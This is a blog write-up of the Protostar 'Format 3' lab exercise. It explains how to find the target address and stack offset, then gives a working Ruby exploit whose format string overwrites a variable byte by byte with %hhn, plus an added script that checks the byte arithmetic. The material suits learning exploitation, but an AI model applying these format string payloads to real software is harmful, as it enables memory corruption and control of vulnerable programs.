Saturday, 24 August 2013

Exploit exercises - Protostar - Format 3

Format 3 was quite easy after the way I tried to solve Format 0 :). The third task in the format section requires writing four bytes to a specific location in memory.


As with the other format exercises, the first task is to find the target address (using objdump -t). Then find the user-supplied input on the stack (set a breakpoint in gdb just before the printf call and list the stack).

The next task is to carefully overwrite the target variable. In this exercise all 4 bytes had to be overwritten. I decided to overwrite them byte by byte using the %hhn format string parameter.

You need to calculate the number of printed characters carefully to overwrite the target variable successfully, because %hhn stores the count of characters printed so far, truncated to one byte. Since we work on a little-endian architecture, you have to write 0x44 to 0x080496f4, 0x55 to 0x080496f5, 0x02 to 0x080496f6 and 0x01 to 0x080496f7.
The first 16 bytes are the little-endian addresses (see the script): 0x080496f4 0x080496f5 0x080496f6 0x080496f7. Next we have to write 0x44 - 0x10 = 0x34, which is 52 bytes, so we put a %52x parameter followed by %12$hhn to use the first DWORD of our input as the address. After that we should write 0x55 - 0x44 = 0x11, which is 17 bytes, followed by %13$hhn. After that you have to write 0x102 - 0x55 = 173 bytes and use the 14th parameter for the write. Lastly, write 0x101 - 0x02 = 255 bytes and use the 15th parameter from the stack. Note that the hhn modifier trims the printed byte count to one byte, so the last two values overflowed past 0xff and were trimmed, giving us the appropriate result.

Script:
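#!/usr/bin/ruby1.9.1
require 'open3'

# Four little-endian target addresses (16 bytes), then a width/%hhn pair per byte.
fmt_string = "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08\xf7\x96\x04\x08%52x%12$hhn%17x%13$hhn%173x%14$hhn%255x%15$hhn"
# Start the exercise binary and keep handles to its standard streams.
stdin, stdout, stderr = Open3.popen3('/opt/protostar/bin/format3')
puts fmt_string
# format3 reads the format string from its standard input.
stdin.puts fmt_string
# Print the two lines the program writes back.
puts stdout.gets
puts stdout.gets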
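
To check the arithmetic above without running the binary, this added example (not part of the original post) replays the character count printf keeps for the post's format string and reports the byte each %N$hhn stores. It assumes, as found in the post, that the 12th parameter is the first DWORD of the input, and that every %Nx with N of 8 or more prints exactly N characters; the names replay and assemble are chosen here.

```ruby
# Added example: replay printf's running character count for the post's
# format string and report the byte each %N$hhn stores.
FMT = ("\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08\xf7\x96\x04\x08" \
       "%52x%12$hhn%17x%13$hhn%173x%14$hhn%255x%15$hhn").b

# first_param: positional index that maps to the first DWORD of the input
# (12 in the post). Returns { address => byte stored }.
def replay(fmt, first_param)
  count = 0                      # characters printed so far
  pos = 0
  writes = {}
  directive = /%(?:(\d+)\$)?(\d*)(hhn|x)/n
  while (m = directive.match(fmt, pos))
    count += m.begin(0) - pos    # literal bytes are printed as-is
    if m[3] == 'x'
      width = m[2].to_i
      # Assumption: a 32-bit value has at most 8 hex digits, so a width
      # of 8 or more always prints exactly `width` characters.
      raise ArgumentError, "width #{width} too small to predict" if width < 8
      count += width
    else
      slot = m[1].to_i - first_param
      addr = fmt.byteslice(slot * 4, 4).unpack('V').first  # little-endian
      writes[addr] = count & 0xff  # hh keeps only the low byte
    end
    pos = m.end(0)
  end
  writes
end

# Combine four consecutive byte writes into the resulting 32-bit value.
def assemble(writes, base)
  (0..3).inject(0) { |v, i| v | (writes.fetch(base + i) << (8 * i)) }
end

if __FILE__ == $0
  w = replay(FMT, 12)
  w.each { |addr, byte| printf("0x%08x <- 0x%02x\n", addr, byte) }
  printf("target = 0x%08x\n", assemble(w, 0x080496f4))
end
```

The running counts are 0x44, 0x55, 0x102 and 0x201, so the last two writes show the one-byte truncation the post describes.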
